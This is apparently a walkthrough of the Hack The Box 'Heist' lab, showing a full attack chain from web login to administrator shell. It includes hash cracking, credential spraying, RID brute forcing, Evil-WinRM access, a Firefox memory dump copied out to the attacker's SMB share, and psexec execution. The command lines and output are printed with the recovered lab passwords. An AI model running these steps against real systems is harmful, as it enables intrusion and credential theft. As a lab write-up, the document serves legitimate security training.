To start, I launched Burp Suite Community Edition and navigated to the target IP address: 10.129.5.22. Upon visiting the site, I was presented with a login portal page that contained several hyperlinks available for further exploration.

First, I used Wappalyzer to identify the software and infrastructure powering the website. Based on the results, the server appears to be running Windows Server with IIS, while the frontend is using PHP. At first glance, that might suggest a typical LAMP stack — however, since the server is running IIS on Windows, it’s more accurate to assume this is a Windows-based stack rather than a traditional Linux/Apache deployment.

Since I didn’t have a username or password at this point, I decided to attempt logging in as a guest. To my surprise, the login was successful and redirected me to an internal portal page that displayed a conversation between an administrator and a user.

t this point, we can confidently confirm this is a Windows environment, as the conversation indicates the user needs a domain account created in order to access shared files. That strongly suggests we’re dealing with an Active Directory-backed infrastructure.

Additionally, the user included an attachment containing what appears to be configuration details from a Cisco router set up by the previous administrator. That’s definitely worth examining further, as configuration files often contain sensitive information such as credentials or internal network details

If you’re familiar with Cisco router configurations and working in the terminal, you’ll recognize these as the commands executed by the previous administrator. A few things immediately stood out to me:

• The hostname: IOS-1
• The configured minimum security password length of 12
• A local router account being created
• An admin account with a defined secret
• SSH being enabled for remote access

Since SSH is enabled and local accounts are configured, that opens the possibility of authenticating directly to the router — assuming we can recover valid credentials.

After doing a bit of quick research (I haven’t touched a Cisco router since my studies at Gwinnett Technical College), I reviewed an article on Cisco password cracking that explains how certain password types are stored. The line:

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91

indicates that the router is using a Type 5 “enable secret,” which is an MD5-based hash. That’s great news for us. Since MD5 is a fast hashing algorithm and well-supported in cracking tools, we can likely leverage hashcat to attempt recovery of the plaintext password.

If successful, those credentials could potentially be reused for SSH access to the router — or even elsewhere in the environment, depending on password hygiene.

jbrown@Jabaris-MacBook-Pro heist % ../tools/hashcat/hashcat -m 500 hash.txt ../wordlist/rockyou.txt
hashcat (v7.1.2-382-g2d71af371) starting
METAL API (Metal 368.52)
========================
* Device #01: Apple M2, skipped
OpenCL API (OpenCL 1.2 (Jul 20 2025 19:29:12)) - Platform #1 [Apple]
====================================================================
* Device #02: Apple M2, GPU, 2730/5461 MB (512 MB allocatable), 10MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 100c
Host memory allocated for this attack: 649 MB (964 MB free)
Dictionary cache built:
* Filename..: ../wordlist/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Speed.....: 464 MiB/s
* Runtime...: 0.29s
$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent              
                                                          Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$pdQG$o8nrSzsGXeaduXrjlvKc91
Time.Started.....: Tue Feb 24 07:40:08 2026 (16 secs)
Time.Estimated...: Tue Feb 24 07:40:24 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (../wordlist/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#02........:   226.4 kH/s (34.00ms) @ Accel:128 Loops:1000 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3604480/14344384 (25.13%)
Rejected.........: 0/3604480 (0.00%)
Restore.Point....: 3276800/14344384 (22.84%)
Restore.Sub.#02..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#02...: texking0316 -> sp00fm00b
Hardware.Mon.SMC.: Fan0: 16%
Hardware.Mon.#02.: Util:100% Pwr:2279mW
Started: Tue Feb 24 07:39:46 2026
Stopped: Tue Feb 24 07:40:25 2026
jbrown@Jabaris-MacBook-Pro heist %

I was able to successfully crack the enable secret hash — the plaintext password is:

stealth1agent

With that in hand, the next step was to turn my attention to the Type 7 passwords found in the configuration. Unlike Type 5, Cisco Type 7 is just a reversible encoding, not true encryption — so it’s trivial to decode with a lookup or online tool.

I used the password cracker at:

👉 https://www.ifm.net.nz/cookbooks/passwordcracker.html

02375012182C1A1D751618034F36415408 = Q4)sJu\Y8qz*A3?d
0242114B0E143F015F5D1E161713 = $uperP@ssword

With credentials in hand, the next logical step was to enumerate the target and confirm what services are exposed.

I started with a standard service and version detection scan:

nmap -sC -sV -T4 -O 10.129.5.22

This allows us to:

• Scan all ports
• Run default NSE scripts
• Identify service versions
• Identify Operating Systems

jbrown@Jabaris-MacBook-Pro heist % sudo nmap -sC -sS -sV -O -T4 10.129.5.22
Password:
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-24 08:16 -0500
Nmap scan report for 10.129.5.22
Host is up (0.085s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp  open  msrpc         Microsoft Windows RPC
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-02-24T13:16:46
|_  start_date: N/A
|_clock-skew: -43s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.16 seconds
jbrown@Jabaris-MacBook-Pro heist %

A few things immediately stood out from the Nmap results.

First, as we already knew, port 80 is running a web server. That aligns with the login portal we discovered earlier.

More interestingly, I noticed:

• Port 445 (SMB) is open
• Port 5985 (WinRM) is open

Now, SMB becomes very interesting.

The scan output shows message signing enabled but not required. That’s important because when signing is not required, it may allow for:

• Anonymous login attempts
• SMB relay opportunities (in other scenarios)
• Credential-based authentication without enforced integrity checks

So naturally, the next step was to test anonymous access.

jbrown@Jabaris-MacBook-Pro heist % smbutil view -G  //10.129.5.22/ 
Password for 10.129.5.22: 
smbutil: server rejected the authentication: Authentication error
jbrown@Jabaris-MacBook-Pro heist % smbutil view -G  //10.129.5.22/
Password for 10.129.5.22: 
smbutil: server rejected the authentication: Authentication error
jbrown@Jabaris-MacBook-Pro heist %
jbrown@Jabaris-MacBook-Pro heist % smbutil view -a -N  //10.129.5.22/
smbutil: server rejected the authentication: Authentication error
jbrown@Jabaris-MacBook-Pro heist % smbutil view -a  //10.129.5.22 
smbutil: server rejected the authentication: Authentication error
jbrown@Jabaris-MacBook-Pro heist % smbutil view --help
view: illegal option -- -
usage: smbutil view [connection options] //[domain;][user[:password]@]server
where options are:
    -A    authorize only
    -N    don't prompt for a password
    -G    allow guest access
    -g    authorize with guest only
    -a    authorize with anonymous only
    -f    don't share session
jbrown@Jabaris-MacBook-Pro heist %

Since anonymous/guest access to SMB didn’t work, the next logical step was to try authenticated access using the credentials we recovered.

Instead of manually testing each combination, I leveraged NetExec, the successor to CrackMapExec (https://www.netexec.wiki/). This tool makes credential spraying and service validation extremely efficient in Windows environments.

From the conversation in the portal, we identified two potential usernames:

• admin
• Hazard

Using NetExec, I attempted authentication against SMB on port 445 with the recovered passwords:

jbrown@Jabaris-MacBook-Pro heist % nxc smb 10.129.5.22 -u users -p passwords.txt
SMB         10.129.5.22     445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB         10.129.5.22     445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.5.22     445    SUPPORTDESK      [-] SupportDesk\administrator:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.5.22     445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 
jbrown@Jabaris-MacBook-Pro heist %

Now that we’ve confirmed valid credentials, it’s time to move into share enumeration.

Using NetExec, we can quickly list available SMB shares with our authenticated user:

jbrown@Jabaris-MacBook-Pro heist % nxc smb 10.129.5.22 -u hazard -p stealth1agent --shares
SMB         10.129.5.22     445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB         10.129.5.22     445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.129.5.22     445    SUPPORTDESK      [*] Enumerated shares
SMB         10.129.5.22     445    SUPPORTDESK      Share           Permissions     Remark
SMB         10.129.5.22     445    SUPPORTDESK      -----           -----------     ------
SMB         10.129.5.22     445    SUPPORTDESK      ADMIN$                          Remote Admin
SMB         10.129.5.22     445    SUPPORTDESK      C$                              Default share
SMB         10.129.5.22     445    SUPPORTDESK      IPC$            READ            Remote IPC
jbrown@Jabaris-MacBook-Pro heist %

jbrown@Jabaris-MacBook-Pro heist % nxc smb 10.129.5.22 -u hazard -p stealth1agent --spider C$   
SMB         10.129.5.22     445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB         10.129.5.22     445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.129.5.22     445    SUPPORTDESK      [*] Spidering .
jbrown@Jabaris-MacBook-Pro heist % nxc smb 10.129.5.22 -u hazard -p stealth1agent --spider ADMIN$
SMB         10.129.5.22     445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB         10.129.5.22     445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.129.5.22     445    SUPPORTDESK      [*] Spidering .
jbrown@Jabaris-MacBook-Pro heist % nxc smb 10.129.5.22 -u hazard -p stealth1agent --spider IPC$  
SMB         10.129.5.22     445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB         10.129.5.22     445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.129.5.22     445    SUPPORTDESK      [*] Spidering .
jbrown@Jabaris-MacBook-Pro heist %

hare enumeration didn’t reveal anything immediately useful, so the next logical move is to pivot to WinRM on port 5985.

Since we already have valid credentials, testing WinRM access makes sense — especially in a Windows environment where remote management is commonly enabled for administrators or power users.

To attempt authentication, I used Evil-WinRM:

Last login: Sun Feb 22 15:48:19 on ttys008
jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.5.22 -u hazard -p stealth1agent
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems
                                        Evil-WinRM shell v3.9
                                        Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
                                        Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\> 

though I was able to establish a connection to the WinRM service, attempting to execute commands resulted in a 401 Unauthorized error.

That’s a strong indicator that while the credentials are valid, the user account does not have permission to execute commands over WinRM. In Windows environments, WinRM access typically requires membership in either:

• The Administrators group
• The Remote Management Users group

Since authentication succeeds but command execution fails, it suggests the credentials we harvested are valid for network authentication (like SMB), but the account is not part of the Remote Management Users group — and likely not a local administrator either.

*Evil-WinRM* PS C:\> dir
                                        Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
                                        Error: Exiting with code 1
jbrown@Jabaris-MacBook-Pro evil-winrm %

Although WinRM execution is blocked, we still have valid SMB authentication — and that gives us another powerful enumeration vector: RID brute forcing.

In Windows domains, each user and group is assigned a Relative Identifier (RID) appended to the domain SID. By incrementing RIDs, we can enumerate valid domain users and groups — even without high privileges.

Using NetExec, we can perform RID brute forcing like this:

jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.96.157 -u hazard -p stealth1agent --rid-brute 
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.129.96.157   445    SUPPORTDESK      500: SUPPORTDESK\Administrator (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      501: SUPPORTDESK\Guest (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      513: SUPPORTDESK\None (SidTypeGroup)
SMB         10.129.96.157   445    SUPPORTDESK      1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1009: SUPPORTDESK\support (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1012: SUPPORTDESK\Chase (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1013: SUPPORTDESK\Jason (SidTypeUser)
jbrown@Jabaris-MacBook-Pro evil-winrm %

The RID brute force paid off — we now have a solid list of valid domain users. Whenever enumeration gives you more identities, the next move is simple: test authentication.

jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.96.157 -u Administrator -p passwords.txt
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:passwords.txt STATUS_LOGON_FAILURE 
jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.96.157 -u Administrator -p Q4)sJu\Y8qz*A3?d
zsh: parse error near `)'
jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.96.157 -u Administrator -p "Q4)sJu\Y8qz*A3?d"
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.96.157 -u support -p "Q4)sJu\Y8qz*A3?d"
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:None)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.96.157 -u Chase -p "Q4)sJu\Y8qz*A3?d"
jbrown@Jabaris-MacBook-Pro evil-winrm %

Perfect — now that we’ve identified an account that successfully authenticated over SMB, it’s time to test whether it has WinRM access.

Since port 5985 is open, we can attempt login using Evil-WinRM with the newly validated credentials:

jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.96.157  -u Chase  -p "Q4)sJu\Y8qz*A3?d"
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems
                                        Evil-WinRM shell v3.9
                                        Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
                                        Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        Info: Establishing connection to remote endpoint
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\Chase\Documents>

/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\Chase\Documents> dir
*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
*Evil-WinRM* PS C:\Users\Chase> dir
    Directory: C:\Users\Chase
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        4/22/2019   7:14 AM                3D Objects
d-r---        4/22/2019   7:14 AM                Contacts
d-r---        4/22/2019   6:10 PM                Desktop
d-r---        4/22/2019   6:13 PM                Documents
d-r---        2/18/2021   4:03 PM                Downloads
d-r---        4/22/2019   7:14 AM                Favorites
d-r---        4/22/2019   7:14 AM                Links
d-r---        4/22/2019   7:14 AM                Music
d-r---        4/22/2019   7:14 AM                Pictures
d-r---        4/22/2019   7:14 AM                Saved Games
d-r---        4/22/2019   7:14 AM                Searches
d-r---        4/22/2019   7:14 AM                Videos
*Evil-WinRM* PS C:\Users\Chase> cd Desktop
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir
    Directory: C:\Users\Chase\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---        2/25/2026   5:54 AM             34 user.txt
*Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt
***USERFALGFOUNDHERE*****
*Evil-WinRM* PS C:\Users\Chase\Desktop>

Now for our favorite part — Windows Privilege Escalation — time to go get that admin flag:

*Evil-WinRM* PS C:\Users\Chase\Desktop> upload ~/HTB/tools/PEASS-ng/winPEAS/winPEASps1/winPEAS.ps1
                                        Info: Uploading /Users/jbrown/HTB/tools/PEASS-ng/winPEAS/winPEASps1/winPEAS.ps1 to C:\Users\Chase\Desktop\winPEAS.ps1
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
                                        Data: 125744 bytes of 125744 bytes copied
                                        Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase\Desktop> ./winPEAS.ps1

While running winPEAS, one of the findings shows that the Administrator account is currently logged onto the machine:

=========|| Additonal Winlogon Credentials Check
.
Administrator

though logging in directly as Administrator failed, we can see that there are a few documents on the desktop of the current user, one that seems to list a few task:

*Evil-WinRM* PS C:\Users\Chase\Desktop> dir
    Directory: C:\Users\Chase\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---        2/25/2026   5:54 AM             34 user.txt
-a----        2/25/2026   6:30 AM          94310 winPEAS.ps1
*Evil-WinRM* PS C:\Users\Chase\Desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
*Evil-WinRM* PS C:\Users\Chase\Desktop>

That note suggests the Administrator hasn’t been actively using Firefox to troubleshoot the router configuration issue.

We can verify what’s actually running on the machine by checking active processes.

*Evil-WinRM* PS C:\Users\Chase\Documents\sharphound-v2.9.0> Get-Process | Where-Object {$_.CPU -gt 0} | Select-Object ProcessName, CPU, Id
ProcessName      CPU   Id
-----------      ---   --
dllhost       0.0625 6872
firefox     0.140625 1196
firefox     8.078125 6544
firefox     0.140625 6664
firefox      1.53125 6772
firefox     0.390625 7048
wsmprovhost   1.5625 2912

Since Firefox appears to have been used previously — and Administrator is logged in — memory becomes interesting.

One way to inspect a process’s memory is by using ProcDump, a Sysinternals tool that allows us to dump a running process for offline analysis.

*Evil-WinRM* PS C:\Users\Chase\Desktop> .\procdump64.exe -accepteula -ma 6664 firefox.dmp
ProcDump v11.1 - Sysinternals process dump utility
Copyright (C) 2009-2025 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[06:18:52]Dump 1 info: Available space: 3666587648
[06:18:52]Dump 1 initiated: C:\Users\Chase\Desktop\firefox.dmp
[06:18:52]Dump 1 writing: Estimated dump file size is 290 MB.
[06:18:57]Dump 1 complete: 291 MB written in 5.3 seconds
[06:18:58]Dump count reached.
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir
    Directory: C:\Users\Chase\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/26/2026   6:18 AM      296976327 firefox.dmp
-a----        2/26/2026   6:15 AM              0 myeasylog.log
-a----        2/26/2026   6:14 AM        1339936 procdump.exe
-a----        2/26/2026   6:18 AM         720968 procdump64.exe
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---        2/25/2026   5:54 AM             34 user.txt
-a----        2/25/2026   6:30 AM          94310 winPEAS.ps1
*Evil-WinRM* PS C:\Users\Chase\Desktop>

That dump file is going to be large, and analyzing it directly on the target would be messy. It’s much easier to transfer it back to our attacker machine for offline review.

To do that, we can quickly stand up an SMB share locally using Impacket’s smbserver.py.

jbrown@Jabaris-MacBook-Pro examples % smbserver.py -smb2support -username guest -password guest share ~/HTB/heist/        
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies 

*Evil-WinRM* PS C:\Users\Chase\Desktop> net use x: \\10.10.14.142\share /user:guest guest
The command completed successfully.
*Evil-WinRM* PS C:\Users\Chase\Desktop> cmd /c "copy firefox.dmp X:\"
        1 file(s) copied.
*Evil-WinRM* PS C:\Users\Chase\Desktop>

jbrown@Jabaris-MacBook-Pro heist % ls
firefox.dmp  hash.txt  passwords.txt  sharphound-v2.9.0.zip users

Using strings on the dump was a good first move — but searching for something generic like "password" is going to return a massive amount of noise.

Instead of guessing keywords, a smarter approach is to understand how the frontend actually communicates with the backend. That’s where Burp Suite comes back into play.

In Target → Site Map, Burp maps out the full application structure after interaction.

By reviewing the login endpoint, we can identify:

• The exact parameter names (e.g., username, password, email, token)
• Any hidden fields
• Any API endpoints being hit (e.g., /api/login, /authenticate, etc.)

This is important because those exact parameter names are what we should search for inside the memory dump — not generic words.

Ahhh — that’s the issue.

I was searching for passwords when the actual parameter from Burp was "login_password".

That small difference matters a lot when parsing a memory dump.

So instead of running a broad search, I refined it to:

jbrown@Jabaris-MacBook-Pro heist % strings firefox.dmp | grep login_password 
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
RG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=

With those credentials recovered from memory, we can move toward remote command execution.

Since SMB (port 445) is open, one reliable method is using Impacket’s psexec.py, which allows us to execute commands remotely over SMB. This is commonly used for pass-the-hash or credential-based execution.

jbrown@Jabaris-MacBook-Pro examples % psexec.py '[email protected]'
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies 
Password:
[*] Requesting shares on 10.129.5.22.....
[*] Found writable share ADMIN$
[*] Uploading file cSugIBQB.exe
[*] Opening SVCManager on 10.129.5.22.....
[*] Creating service jdLr on 10.129.5.22.....
[*] Starting service jdLr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

`C:\Windows\system32> cd ..
C:\Windows> cd ..
c
cdC:\>cd
C:\cd users
C:\Users> cd Administrator
C:\Users\Administrator> dir
 Volume in drive C has no label.
 Volume Serial Number is FA65-CD36
 Directory of C:\Users\Administrator
04/22/2019  06:11 PM    <DIR>          .
04/22/2019  06:11 PM    <DIR>          ..
04/21/2019  11:08 AM    <DIR>          3D Objects
04/21/2019  11:08 AM    <DIR>          Contacts
02/18/2021  04:00 PM    <DIR>          Desktop
04/22/2019  08:13 AM    <DIR>          Documents
04/21/2019  11:08 AM    <DIR>          Downloads
04/21/2019  11:08 AM    <DIR>          Favorites
04/21/2019  11:08 AM    <DIR>          Links
04/21/2019  11:08 AM    <DIR>          Music
04/21/2019  11:08 AM    <DIR>          Pictures
04/21/2019  11:08 AM    <DIR>          Saved Games
04/21/2019  11:08 AM    <DIR>          Searches
04/21/2019  11:08 AM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)   3,367,124,992 bytes free
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is FA65-CD36
 Directory of C:\Users\Administrator\Desktop
02/18/2021  04:00 PM    <DIR>          .
02/18/2021  04:00 PM    <DIR>          ..
02/25/2026  05:54 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,367,124,992 bytes free
C:\Users\Administrator\Desktop> type root.txt
****ROOTFLAGFOUNDHERE*****
C:\Users\Administrator\Desktop>

And just like that — we’ve completed the heist. 🎯

What started as simple web enumeration turned into credential harvesting, lateral movement, memory analysis, and finally remote command execution.

Quick recap of the chain:

• Enumerated the web portal and discovered internal conversation + router config
• Cracked the Cisco Type 5 hash → recovered stealth1agent
• Used NetExec to validate credential reuse over SMB
• Enumerated users via RID brute forcing
• Password sprayed and gained stronger access
• Leveraged WinRM foothold for internal enumeration
• Identified Administrator session activity
• Dumped Firefox memory with ProcDump
• Used targeted string searching (login_password) to extract credentials
• Executed remote commands via psexec.py over SMB
• Retrieved the admin flag

Another one down. On to the next.